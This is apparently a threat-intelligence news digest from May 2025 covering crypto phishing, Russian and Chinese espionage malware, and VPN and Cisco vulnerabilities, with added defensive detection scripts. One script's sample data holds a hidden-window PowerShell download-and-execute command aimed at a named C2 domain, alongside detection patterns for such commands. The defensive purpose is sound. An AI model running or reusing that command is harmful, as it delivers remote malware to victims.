Thursday, May 08, 2025 // (IG): BB // GITHUB // SN R&D
Coinbase to Acquire Deribit for $2.9B, Cementing Global Dominance in Crypto Derivatives
Analyst Comments: This acquisition is a strategic leap for Coinbase, aligning with anticipated demand from institutional investors as crypto markets gain regulatory clarity under the Trump administration. Deribit’s vast derivatives trading volume—over $1 trillion in 2024—positions Coinbase to rival traditional exchanges in financial product diversity. However, Deribit's offshore status raises questions about whether Coinbase will shift operations to the U.S., where regulatory risk remains fluid despite current deregulatory momentum. The move could trigger further consolidation in the crypto sector as exchanges race to capture institutional capital.
FROM THE MEDIA: Coinbase will pay $700 million in cash and the remainder in stock to acquire Deribit, a Dubai-based crypto derivatives exchange. Deribit is the global leader in crypto options trading, a sector Coinbase predicts will experience a boom akin to the 1990s equity options surge. This deal follows rising crypto prices, with Bitcoin exceeding $100,000 on the same day, buoyed by pro-crypto policies under President Trump. The transaction is expected to close by year-end, pending regulatory approval. Deribit’s CEO, Luuk Strijers, said the acquisition will expand opportunities across spot, futures, perpetuals, and options. Coinbase's stock rose 5% following the announcement.
READ THE STORY: FT
FreeDrain Phishing Campaign Exploits SEO and Free Hosting to Drain Crypto Wallets
Bottom Line Up Front (BLUF): Security researchers have identified FreeDrain, a global-scale cryptocurrency phishing operation that leverages SEO manipulation, free-tier web services, and generative AI to steal wallet seed phrases. Over 38,000 subdomains have been used to impersonate legitimate crypto platforms and lure victims through high-ranking search results.
Analyst Comments: By abusing free web infrastructure and manipulating SEO, these campaigns easily bypass traditional detection mechanisms. Using generative AI tools like GPT-4o to generate phishing content underscores how adversaries integrate advanced technologies into low-cost, high-impact attacks. As attackers diversify their toolsets and tactics—from Discord hijacking to malvertising campaigns—the crypto space remains particularly vulnerable due to its decentralized nature and lack of strong user-side security mechanisms.
FROM THE MEDIA: The campaign employs over 38,000 subdomains hosted on GitHub Pages, Webflow, and Amazon S3 to deliver fake wallet interfaces via high-ranking search results. Victims searching for queries like “Trezor wallet balance” are redirected through deceptive CAPTCHAs and lure pages before landing on phishing sites that harvest seed phrases. Researchers linked the campaign to actors working in the Indian Standard Time zone based on commit patterns. The attack flow is seamless, automated, and drains funds within minutes. The phishing pages are often generated using LLMs like OpenAI’s GPT-4o, while SEO spamdexing tactics ensure their visibility. Parallel investigations by Check Point and Bitdefender reveal similar crypto-targeted attacks using Discord and Facebook ads, with the Inferno Drainer toolkit alone compromising 30,000 wallets between September 2024 and March 2025, resulting in $9 million in theft.
READ THE STORY: THN
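The campaign above combines free-tier hosting with wallet-brand lures, which gives a defender a cheap hunting rule: a hostname whose attacker-controlled label carries a wallet brand name and whose suffix is a free hosting platform. The following classifier is an added example, not code from the researchers cited; the hosting suffixes and brand tokens are illustrative assumptions, and the URLs are constructed rather than taken from the campaign.

```python
"""Flag wallet-brand impersonation hosted on free-tier platforms.

Added example, not code from the cited researchers. It reports hosts that
combine (a) a free-hosting suffix of the kind the campaign abused and
(b) a crypto-wallet brand token in the user-controlled label.
"""
from urllib.parse import urlsplit

# Platforms named in the article; the exact suffixes are assumptions about
# how each platform exposes user-published sites.
FREE_HOST_SUFFIXES = (
    ".github.io",
    ".webflow.io",
    ".s3.amazonaws.com",
)
# Wallet brands an impersonation page would borrow (illustrative list).
BRAND_TOKENS = ("trezor", "ledger", "metamask", "phantom", "coinbase", "exodus")


def attacker_label(host: str):
    """Return (user-controlled label, suffix) for a free host, else None."""
    for suffix in FREE_HOST_SUFFIXES:
        if host.endswith(suffix):
            return host[: -len(suffix)], suffix
    return None


def classify(url: str) -> dict:
    """Classify one URL; only the hostname matters for this rule."""
    host = (urlsplit(url).hostname or "").lower()
    hit = attacker_label(host)
    if hit is None:
        return {"url": url, "suspicious": False, "reason": "not on a free-hosting suffix"}
    label, suffix = hit
    brands = [b for b in BRAND_TOKENS if b in label]
    if not brands:
        return {"url": url, "suspicious": False, "reason": f"free host {suffix} but no brand token"}
    return {"url": url, "suspicious": True, "reason": f"brand {brands[0]} on free host {suffix}"}


def triage(urls):
    """Return only the suspicious classifications, in input order."""
    return [c for c in map(classify, urls) if c["suspicious"]]


# Constructed sample URLs, not indicators from the campaign.
SAMPLE_URLS = [
    "https://trezor-wallet-balance.github.io/",
    "https://ledger-live-restore.webflow.io/recover",
    "https://my-portfolio-site.github.io/",
    "https://docs.python.org/3/",
    "https://metamask-support-2025.s3.amazonaws.com/index.html",
]

if __name__ == "__main__":
    for c in triage(SAMPLE_URLS):
        print(c["url"], "->", c["reason"])
```

Feed it search-result URLs or proxy logs; a brand token on a platform that hands out free subdomains is a strong enough signal to queue the page for review, and a false positive (a legitimate community site on GitHub Pages) costs one analyst glance.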
FBI Cyber Division Chief Bryan Vorndran to Retire Amid Growing Focus on Threat Disruption
Bottom Line Up Front (BLUF): Bryan Vorndran, assistant director of the FBI’s Cyber Division since 2021, is expected to retire soon. This marks the end of a pivotal tenure that saw the agency shift toward more proactive cyber threat disruption strategies. His departure is unrelated to recent personnel shakeups under the Trump administration and stems from retirement eligibility.
Analyst Comments: Under his watch, the bureau increased operational tempo through joint operations, international partnerships, and infrastructure takedowns—often in collaboration with CISA. His advocacy for greater FBI involvement in incident reporting frameworks helped shape landmark legislation (CIRCIA) that reflects the growing integration of law enforcement in national cyber defense. His successor will likely face pressure to maintain momentum in a volatile threat landscape, especially amid increasing politicization of federal cybersecurity agencies.
FROM THE MEDIA: During his tenure, the bureau expanded its cyber disruption tactics, coordinating 17 global operations last year, including takedowns of BreachForums and a China-linked botnet. Vorndran co-chaired the Joint Ransomware Task Force with CISA, advocating for real-time intelligence sharing between law enforcement and federal cyber agencies. His approach emphasized arresting cybercriminals and dismantling the infrastructure, financial networks, and communications that enable their operations. His departure comes as CIRCIA’s final implementation looms, a regulation he helped shape to ensure the FBI remains central to federal cyber response efforts.
READ THE STORY: The Record
Dutch Intelligence Chief Warns China’s Cyber Threat Surpasses Russia’s as European Tensions Mount
Bottom Line Up Front (BLUF): Vice Adm. Peter Reesink, head of Dutch military intelligence (MIVD), has warned that China now poses a greater cyber threat to Europe than Russia, citing Beijing’s advanced and opaque cyber capabilities. The warning comes amid revelations of Chinese intrusions in European networks and Russia’s continued hybrid aggression and military buildup along NATO’s borders.
Analyst Comments: While Russia remains the more immediate kinetic threat, particularly amid its war in Ukraine and cyberattacks during European elections, Reesink’s remarks highlight a growing consensus that China’s long-term cyber capabilities and infiltration efforts present a more sophisticated and less understood risk. The alignment of Russian and Chinese strategic interests adds further urgency for Europe to enhance cyber resilience and reduce dependency on U.S. intelligence, particularly as Trump's return to power introduces transatlantic uncertainty.
FROM THE MEDIA: Vice Adm. Peter Reesink stated that China’s cyber infrastructure is “more threatening than Russia,” citing its complexity and stealth. MIVD’s latest report details Chinese cyber group Salt Typhoon’s infiltration of U.S. telecoms and similar behavior observed in Europe, targeting at least 10 countries. While Russia continues to conduct hybrid operations, including cyberattacks during the 2024 European elections, Reesink emphasized that China's capabilities are less visible but deeply embedded. He also voiced concern over Donald Trump’s consolidation of control over U.S. intelligence, prompting European agencies to reassess intelligence-sharing protocols. Russia’s military buildup near NATO borders and increased defense spending further underscore the dual-threat environment facing Europe.
READ THE STORY: POLITICO
Russia-Backed COLDRIVER Hackers Deploy LOSTKEYS Malware in Targeted Espionage Attacks
Bottom Line Up Front (BLUF): Google’s Threat Intelligence Group has identified a new malware campaign by Russian state-sponsored threat actor COLDRIVER. The campaign uses a custom tool dubbed LOSTKEYS to exfiltrate sensitive data from Western government, media, and NGO targets. It employs sophisticated social engineering and multi-stage PowerShell-based infection chains, with activity confirmed as recent as April 2025.
Analyst Comments: Using “ClickFix” social engineering and VM evasion techniques highlights the group’s growing technical sophistication and operational selectivity. The malware’s ability to harvest documents and system metadata presents a direct espionage risk to NATO-aligned nations and civil society actors. Organizations must heighten defenses against clipboard-based script lures and adopt sandboxing, endpoint monitoring, and behavioral analysis to counter stealthy malware delivery methods.
FROM THE MEDIA: The COLDRIVER APT, linked to Russia’s FSB and also known as Star Blizzard or Callisto Group, has been observed deploying LOSTKEYS malware in espionage campaigns since late 2023. Victims are lured into running clipboard PowerShell scripts via fake CAPTCHA prompts—a tactic dubbed “ClickFix”—which initiate a multi-stage chain culminating in LOSTKEYS deployment. The malware targets files by extension and directory, and transmits system information to command-and-control infrastructure hosted at cloudmediaportal[.]com and 165.227.148[.]68. The tool has been selectively deployed against high-value individuals, and variants were disguised as legitimate software, such as Maltego. Google has issued Safe Browsing warnings and recommends enabling Enhanced Protection in Chrome to mitigate such threats.
READ THE STORY: BleepingComputer // GBhackers
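The infection chain above starts with a user pasting a clipboard PowerShell command, so the first detection opportunity is the PowerShell command line itself. The script below is an added example, not Google TIG's or the cited articles' code: it scores constructed records shaped like PowerShell command-line logging events (fields id, parent, cmdline) with the traits a ClickFix launch tends to have. Assumptions: that a ClickFix victim pastes into the Windows Run dialog, so the parent process is explorer.exe, and that the article's indicators (given defanged on the page) are refanged here for matching.

```python
"""Triage constructed PowerShell launch records for ClickFix-style lures.

Added example, not code from Google TIG or the cited articles. Scores a
command line the way an analyst would when hunting the clipboard-paste
lure: user-launched (assumption: explorer.exe parent via Win+R), hidden
window, remote fetch/eval, and contact with the infrastructure the
article names.
"""
import re
from dataclasses import dataclass, field

# Indicators from the article, refanged for matching.
ARTICLE_IOCS = ("cloudmediaportal.com", "165.227.148.68")

# (regex over the lower-cased command line, weight, label)
HEURISTICS = [
    (r"-(?:w|win|windowstyle)\s+hidden", 2, "hidden window"),
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3, "encoded command"),
    (r"\b(?:iex|invoke-expression)\b", 2, "invoke-expression"),
    (r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", 2, "remote fetch"),
    (r"-(?:ep|executionpolicy)\s+bypass", 1, "execution policy bypass"),
]


@dataclass
class Finding:
    event_id: int
    score: int
    reasons: list = field(default_factory=list)


def score_event(event: dict) -> Finding:
    """Score one record with keys id, parent, cmdline."""
    low = event["cmdline"].lower()
    f = Finding(event_id=event["id"], score=0)
    # Assumption: a pasted ClickFix command is launched from the Run dialog.
    if event.get("parent", "").lower() == "explorer.exe":
        f.score += 2
        f.reasons.append("launched from explorer.exe (Run dialog)")
    for pattern, weight, label in HEURISTICS:
        if re.search(pattern, low):
            f.score += weight
            f.reasons.append(label)
    for ioc in ARTICLE_IOCS:
        if ioc in low:
            f.score += 5
            f.reasons.append(f"known C2 indicator {ioc}")
    return f


def triage(events, threshold=5):
    """Return findings at or above threshold, highest score first."""
    hits = [score_event(e) for e in events]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "parent": "explorer.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "iex (New-Object Net.WebClient)'
                '.DownloadString(\'https://cloudmediaportal.com/check\')"'},
    {"id": 2, "parent": "code.exe",
     "cmdline": "powershell -NoProfile -File build.ps1"},
    {"id": 3, "parent": "explorer.exe",
     "cmdline": "powershell Get-Process"},
    {"id": 4, "parent": "svchost.exe",
     "cmdline": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f.event_id, f.score, ", ".join(f.reasons))
```

Only the first record crosses the threshold; the encoded command from svchost.exe (record 4) scores 3 on its own, which is deliberate, since a single trait such as an encoded command is common in legitimate management tooling and should raise an alert only in combination with user launch, hidden window or a known indicator.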
MirrorFace Targets Japan and Taiwan with ROAMINGMOUSE and Upgraded ANEL Malware
Bottom Line Up Front (BLUF): The Chinese state-aligned APT group MirrorFace (aka Earth Kasha) has intensified cyber espionage efforts targeting government institutions in Japan and Taiwan using a spear-phishing campaign that deploys new versions of ANEL and NOOPDOOR malware. A newly observed dropper, ROAMINGMOUSE, facilitates the infection chain, while the updated ANEL includes in-memory execution of Cobalt Strike components.
Analyst Comments: MirrorFace’s latest campaign underscores a tactical shift toward more modular, stealthy implants and advanced in-memory payload execution, likely aimed at extending post-compromise persistence while avoiding detection. Using legitimate OneDrive links and compromised email accounts in spear-phishing efforts demonstrates increasing operational maturity. The integration of DNS-over-HTTPS in NOOPDOOR reflects a broader trend among APTs toward encrypting C2 traffic to frustrate traditional network monitoring tools. Expect continued pressure on regional targets aligned with China’s geopolitical interests, including surveillance on policy shifts, defense posture, and foreign alliances.
FROM THE MEDIA: Spear-phishing emails containing legitimate OneDrive links were used to deliver ZIP archives embedded with macro-laden Excel files and the ROAMINGMOUSE dropper. Once executed, ROAMINGMOUSE unpacks an encrypted payload and side-loads a malicious DLL (ANELLDR) via a legitimate executable to install ANEL. The upgraded ANEL includes a new feature enabling in-memory execution of Beacon Object Files (BOFs) for Cobalt Strike. In some cases, SharpHide was used to deploy NOOPDOOR, a backdoor featuring DNS-over-HTTPS for stealthy command-and-control. The campaign reflects persistent, targeted efforts to collect intelligence from strategic adversaries in East Asia.
READ THE STORY: THN
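NOOPDOOR's use of DNS-over-HTTPS means its resolver traffic looks like ordinary TLS to port 443, so the useful question at the endpoint is which process is talking to a public DoH resolver. The script below is an added example, not code from the cited researchers: it reads constructed per-process connection records and alerts when a process outside an approved list (an assumption to tune per fleet) reaches a known public DoH endpoint. The resolver hostnames are real public services, used here only as destinations to watch.

```python
"""Flag DNS-over-HTTPS use by processes that should not be resolving over HTTPS.

Added example, not code from the cited researchers. Records are constructed
lines of the form 'ts process pid dst_host dst_port'.
"""
from collections import Counter

# Public DoH resolvers (real services, used as a watch-list of destinations).
DOH_RESOLVERS = {"dns.google", "cloudflare-dns.com", "dns.quad9.net", "doh.opendns.com"}
# Processes expected to speak DoH on a managed endpoint (assumption; tune per fleet).
APPROVED_DOH_CLIENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "svchost.exe"}


def parse_record(line: str) -> dict:
    """Parse one constructed connection record."""
    ts, proc, pid, host, port = line.split()
    return {"ts": ts, "proc": proc.lower(), "pid": int(pid),
            "host": host.lower(), "port": int(port)}


def is_doh_flow(rec: dict) -> bool:
    """True when the destination is a public DoH resolver on 443."""
    return rec["port"] == 443 and rec["host"] in DOH_RESOLVERS


def hunt(lines):
    """Return (alerts for unapproved DoH talkers, per-process DoH counts)."""
    alerts, counts = [], Counter()
    for line in lines:
        rec = parse_record(line)
        if not is_doh_flow(rec):
            continue
        counts[rec["proc"]] += 1
        if rec["proc"] not in APPROVED_DOH_CLIENTS:
            alerts.append((rec["ts"], rec["proc"], rec["pid"], rec["host"]))
    return alerts, counts


# Constructed sample records, not real telemetry.
SAMPLE_LOG = """\
2025-05-08T09:00:01Z chrome.exe 4120 dns.google 443
2025-05-08T09:00:07Z EXCEL.EXE 5012 onedrive.live.com 443
2025-05-08T09:00:09Z rundll32.exe 5310 cloudflare-dns.com 443
2025-05-08T09:00:12Z rundll32.exe 5310 cloudflare-dns.com 443
2025-05-08T09:01:30Z firefox.exe 6000 dns.quad9.net 443
2025-05-08T09:02:00Z svchost.exe 1200 dns.google 443
""".splitlines()

if __name__ == "__main__":
    found, totals = hunt(SAMPLE_LOG)
    for a in found:
        print("ALERT", *a)
    print(dict(totals))
```

The per-process counts are kept alongside the alerts because a fleet-wide baseline of which binaries normally use DoH is what makes the approved list defensible; a process that appears for the first time with a handful of resolver connections is the case worth pulling the side-loaded DLL from.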
IXON VPN Vulnerabilities Allow Privilege Escalation Across Windows, Linux, and macOS Systems
Bottom Line Up Front (BLUF): Researchers have disclosed two critical vulnerabilities (CVE-2025-26168 and CVE-2025-26169) in the IXON VPN client affecting versions ≤1.4.3, enabling local attackers to escalate privileges to SYSTEM or root on major operating systems. IXON has released a patched version (1.4.4), urging immediate updates to prevent exploitation in industrial and enterprise networks.
Analyst Comments: The vulnerability is especially dangerous in operational technology (OT) environments, where VPN clients often bridge internal and remote systems. Its exploitation could lead to lateral movement across sensitive industrial control networks, posing safety and uptime risks. Vendors must prioritize secure privilege boundaries and cryptographic validation mechanisms as reliance on remote access tools grows. Organizations should treat this as a high-priority vulnerability and move quickly to patch, audit logs, and implement defense-in-depth measures.
FROM THE MEDIA: IXON VPN clients for Windows, Linux, and macOS contain privilege escalation flaws stemming from insecure storage and execution of OpenVPN configuration files. Researchers Andreas Vikerup and Dan Rosenqvist of Shelltrail identified the vulnerability, which enables attackers to replace temporary config files in shared directories with malicious content, tricking the VPN client into executing code with elevated permissions. Affected systems can be fully compromised if exploited, especially in shared environments such as managed service providers or factories. The vulnerability was assigned a CVSS 8.1. IXON has released version 1.4.4 with a fix, which includes moving config storage to user-specific directories and adding signature verification.
READ THE STORY: GBhackers
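The fix described above has two parts: keep the configuration out of a shared directory, and verify it before a privileged component acts on it. The loader below is an added example, not IXON's code, showing what those two controls look like for any privileged helper that consumes a user-supplied config file. It stores the file under a per-user 0700 directory, refuses symlinks, files owned by another user, group- or world-writable files and shared-writable parents, and checks a detached signature before returning the body. The signature scheme is an HMAC-SHA256 under a key the helper holds; that is an assumption standing in for whatever IXON actually shipped, and a public-key signature would be the production choice. The directory name and config contents are hypothetical.

```python
"""Load a VPN-style config only from a private, verified location.

Added example, not IXON's code. Demonstrates per-user config storage plus
signature verification before a privileged helper trusts the file. The
HMAC is a stand-in for a real signature scheme.
"""
import hashlib
import hmac
import os
import stat
import tempfile
from pathlib import Path
from typing import Optional


class UnsafeConfig(Exception):
    pass


def private_config_dir(base: Optional[Path] = None) -> Path:
    """Create (or reuse) a 0700 directory owned by the current user."""
    d = (base or Path.home()) / ".vpn-example"   # hypothetical path, not IXON's
    d.mkdir(mode=0o700, exist_ok=True)
    os.chmod(d, 0o700)   # mkdir's mode is masked by umask; enforce it explicitly
    return d


def sign(body: bytes, key: bytes) -> str:
    return hmac.new(key, body, hashlib.sha256).hexdigest()


def write_signed_config(directory: Path, name: str, body: bytes, key: bytes) -> Path:
    """Write the config 0600 without following symlinks, plus a detached .sig."""
    path = directory / name
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    with os.fdopen(os.open(path, flags, 0o600), "wb") as fh:
        fh.write(body)
    path.with_suffix(path.suffix + ".sig").write_text(sign(body, key))
    return path


def load_verified_config(path: Path, key: bytes) -> bytes:
    """Refuse anything another user could have planted or altered."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        raise UnsafeConfig("config path is a symlink")
    if not stat.S_ISREG(st.st_mode):
        raise UnsafeConfig("config is not a regular file")
    if hasattr(os, "getuid") and st.st_uid != os.getuid():
        raise UnsafeConfig("config not owned by the invoking user")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise UnsafeConfig("config is group- or world-writable")
    parent = os.lstat(path.parent)
    if parent.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not parent.st_mode & stat.S_ISVTX:
        raise UnsafeConfig("parent directory is shared-writable")
    body = path.read_bytes()
    expected = path.with_suffix(path.suffix + ".sig").read_text().strip()
    if not hmac.compare_digest(sign(body, key), expected):
        raise UnsafeConfig("signature mismatch: config changed after signing")
    return body


def demo(tmp: Optional[Path] = None, key: bytes = b"example-key-not-real") -> dict:
    """Good load, then a symlink and an unsigned edit are both rejected."""
    if tmp is None:
        with tempfile.TemporaryDirectory() as t:
            return demo(Path(t), key)
    d = private_config_dir(tmp)
    p = write_signed_config(d, "client.ovpn", b"remote vpn.example.invalid 1194\n", key)
    loaded = load_verified_config(p, key)
    link = d / "link.ovpn"
    os.symlink(p, link)
    try:
        load_verified_config(link, key)
        symlink_rejected = False
    except UnsafeConfig:
        symlink_rejected = True
    p.write_bytes(b"remote other.example.invalid 1194\n")   # edit without re-signing
    try:
        load_verified_config(p, key)
        tampered_rejected = False
    except UnsafeConfig:
        tampered_rejected = True
    return {"loaded": loaded, "symlink_rejected": symlink_rejected,
            "tampered_rejected": tampered_rejected}


if __name__ == "__main__":
    print(demo())
```

The parent-directory check is the one that maps most directly onto the article's description of the flaw: a temporary file in a directory every local user can write to is replaceable by any of them, so a helper that runs as root or SYSTEM must never consume one from there, regardless of what else it verifies.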
Bill Gates Commits $200B to Global Health by 2045 Amid Threats from Trump-Era Policy Shifts
Bottom Line Up Front (BLUF): Bill Gates has announced plans to give away nearly all his fortune—$200 billion—through the Gates Foundation over the next 20 years, aiming to close it by 2045. However, his ambitious global health goals face mounting political challenges, including steep U.S. foreign aid cuts and potential loss of the foundation’s tax-exempt status under the Trump administration.
Analyst Comments: Gates' strategy to "spend down" rather than perpetually endow the foundation marks a bold shift in philanthropic planning, focusing on urgency and impact over legacy. Yet, even his record-breaking wealth may not counterbalance the severe rollback of governmental aid, particularly the dismantling of USAID under Elon Musk’s and Trump’s influence. With Trump’s administration signaling hostility toward global development goals and philanthropic tax privileges, the very framework enabling Gates' ambitions may be eroded. His cautious stance toward Trump—despite deep ideological rifts—signals an attempt to preserve influence in a hostile political environment.
Cisco Patches Critical SISF Vulnerability in IOS Software That Enables DHCPv6-Based DoS Attacks
Bottom Line Up Front (BLUF): Cisco has issued security updates to fix a critical vulnerability in its Switch Integrated Security Features (SISF) affecting IOS, IOS XE, NX-OS, and AireOS software. The flaw allows unauthenticated, adjacent attackers to trigger device reloads via crafted DHCPv6 packets, potentially disrupting network operations.
Analyst Comments: While the requirement for network adjacency limits the attack’s reach, its potential to crash core switching and wireless infrastructure in enterprise environments makes it a high-priority risk. With no workaround available, the urgency of applying Cisco’s patches cannot be overstated. Organizations should also consider segmenting management planes and monitoring for anomalous DHCPv6 traffic to detect early signs of exploitation.
FROM THE MEDIA: Cisco disclosed a critical denial-of-service (DoS) vulnerability in SISF components across several networking platforms. The flaw arises from improper handling of DHCPv6 packets, allowing an unauthenticated attacker on the same local network to send malicious packets that force vulnerable devices to reload. Impacted platforms include Cisco IOS and IOS XE Software, NX-OS running on Nexus 3000/7000/9000 (in standalone mode), and WLC AireOS Software. Cisco has released patches for all affected versions, noting that no exploitation has been reported in the wild. Admins are urged to update immediately and can verify exposure using built-in diagnostic commands like show ipv6 snooping policies.
READ THE STORY: GBhackers
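The advisory leaves patching as the only fix, but the Analyst Comments also suggest monitoring for anomalous DHCPv6 traffic on the local link. The script below is an added example, not Cisco's code or its diagnostic command: it parses the DHCPv6 message layout from RFC 8415 (1-byte msg-type, 3-byte transaction-id, then option code/length/data TLVs) and applies two generic signals a link-local monitor could use, malformed option encoding and a per-source burst rate. The frames are constructed; nothing here reproduces the Cisco bug, whose exact trigger the article does not describe.

```python
"""Parse DHCPv6 headers and flag anomalous senders on a link.

Added example, not Cisco's code. Message and option layout follow RFC 8415;
the anomaly thresholds are illustrative.
"""
import struct
from collections import defaultdict

MSG_TYPES = {1: "SOLICIT", 2: "ADVERTISE", 3: "REQUEST", 4: "CONFIRM", 5: "RENEW",
             6: "REBIND", 7: "REPLY", 8: "RELEASE", 9: "DECLINE", 10: "RECONFIGURE",
             11: "INFORMATION-REQUEST", 12: "RELAY-FORW", 13: "RELAY-REPL"}


class Malformed(ValueError):
    pass


def parse_dhcpv6(payload: bytes) -> dict:
    """Return {'type', 'xid', 'options'}; raise Malformed on bad encoding."""
    if len(payload) < 4:
        raise Malformed("shorter than the 4-byte header")
    msg_type = payload[0]
    xid = int.from_bytes(payload[1:4], "big")
    if msg_type not in MSG_TYPES:
        raise Malformed(f"unknown msg-type {msg_type}")
    options, off = [], 4
    while off < len(payload):
        if len(payload) - off < 4:
            raise Malformed("truncated option header")
        code, length = struct.unpack_from("!HH", payload, off)
        off += 4
        if off + length > len(payload):
            raise Malformed(f"option {code} length {length} exceeds packet")
        options.append((code, payload[off:off + length]))
        off += length
    return {"type": MSG_TYPES[msg_type], "xid": xid, "options": options}


def build(msg_type: int, xid: int, options=()) -> bytes:
    """Encode a well-formed message; used only for the constructed samples."""
    out = bytes([msg_type]) + xid.to_bytes(3, "big")
    for code, data in options:
        out += struct.pack("!HH", code, len(data)) + data
    return out


def monitor(frames, window=1.0, burst=5):
    """frames: iterable of (timestamp, src, payload). Returns a list of alerts."""
    alerts = []
    seen = defaultdict(list)   # src -> timestamps of valid messages in the window
    for ts, src, payload in frames:
        try:
            msg = parse_dhcpv6(payload)
        except Malformed as e:
            alerts.append((ts, src, f"malformed: {e}"))
            continue
        seen[src] = [t for t in seen[src] if ts - t <= window] + [ts]
        if len(seen[src]) == burst:   # fire once as the threshold is crossed
            alerts.append((ts, src, f"burst: {burst} msgs in {window}s (last {msg['type']})"))
    return alerts


# Constructed link-local traffic: (timestamp, source, payload).
# Option codes: 1 = CLIENTID, 3 = IA_NA, 8 = ELAPSED_TIME.
SAMPLE_FRAMES = [
    (0.0, "fe80::1", build(1, 0x0A0B0C, [(1, b"\x00\x01duid1"), (8, b"\x00\x00")])),
    (0.5, "fe80::2", build(11, 0x111111, [(1, b"\x00\x01duid2")])),
    (1.0, "fe80::1", build(3, 0x0A0B0D, [(1, b"\x00\x01duid1"), (3, b"\x00" * 12)])),
    # option header claims 64 bytes of data but only 3 follow
    (2.0, "fe80::dead", b"\x01\x00\x00\x01\x00\x01\x00\x40abc"),
] + [(3.0 + i * 0.125, "fe80::beef", build(1, 0x200000 + i)) for i in range(8)]

if __name__ == "__main__":
    for a in monitor(SAMPLE_FRAMES):
        print(*a)
```

On a real switch port the frames would come from a SPAN session or a host capture on the VLAN; the parser rejects bad encoding before any per-source bookkeeping, so a sender that is only emitting junk never pollutes the rate table for legitimate clients.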
OpenAI Hires Instacart CEO Fidji Simo to Lead Consumer-Facing Applications
Bottom Line Up Front (BLUF): OpenAI has appointed Instacart CEO Fidji Simo as CEO of its Applications division, signaling a shift toward scaling consumer-facing AI products. A former Facebook executive, Simo will report directly to OpenAI CEO Sam Altman and formally assume the role later this year.
Analyst Comments: The appointment signals a strategic pivot by OpenAI to prioritize end-user monetization over traditional B2B or enterprise adoption, especially as AI pilot projects struggle to demonstrate ROI. Simo’s background in consumer platforms like Facebook and Instacart positions her to steer product-market fit for tools like ChatGPT, potentially accelerating mainstream adoption and revenue. The timing also coincides with OpenAI’s broader efforts to ease financial pressure after a $5B loss in 2024. With rising subscription offerings and a tighter consumer focus, OpenAI seems poised to diversify its revenue streams—if it can overcome the still-nascent state of real-world AI utility.
FROM THE MEDIA: Simo, who has served on OpenAI's board since 2024, will take the helm later this year and report directly to CEO Sam Altman. The move allows Altman to concentrate on research, compute infrastructure, and AI safety while Simo leads product development for consumer-facing tools. The announcement follows OpenAI’s decision to retain its nonprofit oversight structure after backlash to a planned governance shift. Financially, OpenAI seeks to reduce last year’s $5B loss with new revenue initiatives like its $200/month Deep Research subscription. Analysts see Simo’s appointment as a push to broaden the appeal beyond business users and capitalize on growing public interest in generative AI.
READ THE STORY: The Register
Items of interest
US Retains AI Leadership Over China Despite R1 Breakthrough, Insikt Group Finds
Bottom Line Up Front (BLUF): China remains behind the US in overall artificial intelligence (AI) capabilities despite its recent advancements, including the release of the DeepSeek R1 model in early 2025. According to Insikt Group’s comprehensive assessment, China’s AI ecosystem lags in funding, talent, hardware, and diffusion capacity. However, it continues to close the gap through open-source innovation, government-backed investments, and aggressive industrial policy.
Analyst Comments: While the release of DeepSeek R1 marked a symbolic "Sputnik moment," Insikt’s analysis tempers fears of imminent AI supremacy by China. The US still leads private sector investment, access to elite talent, computing infrastructure, and core innovation. However, China's emphasis on diffusion, particularly via open-source distribution, and resilience in the face of export controls suggests a long-term competitive trajectory. Strategic risks remain, especially as China leverages economic espionage, regulatory advantages, and a state-aligned AI development model. The AI race is no longer solely about frontier models but national capacity to implement and operationalize them at scale.
FROM THE MEDIA: Despite China’s goal to lead in AI by 2030 and its January 2025 release of the DeepSeek R1 model — which caused a historic market loss for Nvidia — Insikt assesses that the US still leads in nearly all critical AI development pillars. These include venture capital funding, elite talent pools, hardware capabilities, and regulatory flexibility. China, however, is closing the performance gap and leads in generative AI patent filings. It also benefits from a synergistic collaboration between government, academia, and private companies, and is aggressively investing in its semiconductor capabilities to reduce reliance on US technologies. The report warns that the true battleground may be in AI diffusion, not just innovation, and urges Western entities to strengthen IP protections, export compliance, and global talent strategies.
READ THE STORY: RecordedFuture
We Investigated China’s Silicon Valley (It's Not What We Expected) (Video)
FROM THE MEDIA: What we saw was beyond anything we expected: Robots running hotels, EV adoption so widespread that gas cars are nearly extinct, AI integrated into factories, streets, and classrooms. Our trip broke a lot of the biases and myths we had about China.
Yuval Noah Harari: This Election Will Tear The Country Apart! AI Will Control You By 2034! (Video)
FROM THE MEDIA: Yuval Noah Harari is a best-selling author, public intellectual and Professor of History at the Hebrew University of Jerusalem. He is the author of multi-million bestseller books such as ‘Sapiens: A Brief History of Humankind’ and ‘Homo Deus: A Brief History of Tomorrow’.
The selected stories cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in its original material or related links on its sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.